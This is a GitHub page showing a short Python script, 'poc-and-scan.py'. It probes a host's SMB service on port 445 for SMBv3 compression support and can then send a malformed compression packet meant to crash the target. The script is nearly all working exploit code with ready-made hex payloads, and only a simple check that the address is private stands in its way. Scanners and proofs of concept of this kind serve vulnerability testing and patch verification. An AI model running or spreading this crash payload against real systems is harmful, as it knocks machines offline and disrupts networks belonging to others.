-
Notifications
You must be signed in to change notification settings - Fork 2
/
poc-and-scan.py
54 lines (47 loc) · 2.05 KB
/
poc-and-scan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, socket, struct
if len(sys.argv) != 3 or sys.argv[2] not in ["Y", "N"]:
print("Scan only: %s IP N" % (sys.argv[0]))
print("Scan+Crash: %s IP Y" % (sys.argv[0]))
exit()
my_IP = list(map(int, sys.argv[1].strip().split('.')[:2]))
if my_IP[0] == 10 or my_IP[0] == 127: pass
elif my_IP[0] == 172 and my_IP[1] in range(16, 31): pass
elif my_IP[0] == 192 and my_IP[1] == 168: pass
else:
print("Never use on public IPs!")
exit()
SMB_negotiation = "000000b2fe534d424000010000000000" + \
"00002100100000000000000000000000" + \
"00000000fffe00000000000000000000" + \
"00000000000000000000000000000000" + \
"0000000024000500010000007f000000" + \
"aa9952d87063ea118a76005056b886b0" + \
"70000000020000000202100200030203" + \
"11030000010026000000000001002000" + \
"01006c6110bcde71a04e50810ffac076" + \
"9c32c4c011cf86e26deb2ba923cd79cb" + \
"bf7c000003000a000000000001000000" + \
"000000000100"
s = socket.socket(2,1)
s.connect((sys.argv[1],445))
s.send(bytes.fromhex(SMB_negotiation))
rcv_buf = s.recv(4096)
smb_vers = struct.unpack("<H", rcv_buf[72:74])[0]
if rcv_buf.endswith(b"\x00"*7 + b"\x01\x00"):
print("SMB v" + hex(smb_vers)[2:] + " with LZNT1 detected.")
elif rcv_buf.endswith(b"\x00"*7 + b"\x02\x00"):
print("SMB v" + hex(smb_vers)[2:] + " with LZ77 detected.")
elif rcv_buf.endswith(b"\x00"*7 + b"\x03\x00"):
print("SMB v" + hex(smb_vers)[2:] + " with LZ77+Huffman detected.")
else: print("SMB v" + hex(smb_vers)[2:] + " with no compression.")
SMB_crash = "00000042fc534d423200000001000000" + \
"ffffffff414141414141414141414141" + \
"41414141414141414141414141414141" + \
"41414141414141414141414141414141" + \
"414141414141"
if sys.argv[2] == "Y":
print("Sending malformed packet per user request!")
s.send(bytes.fromhex(SMB_crash))
s.close()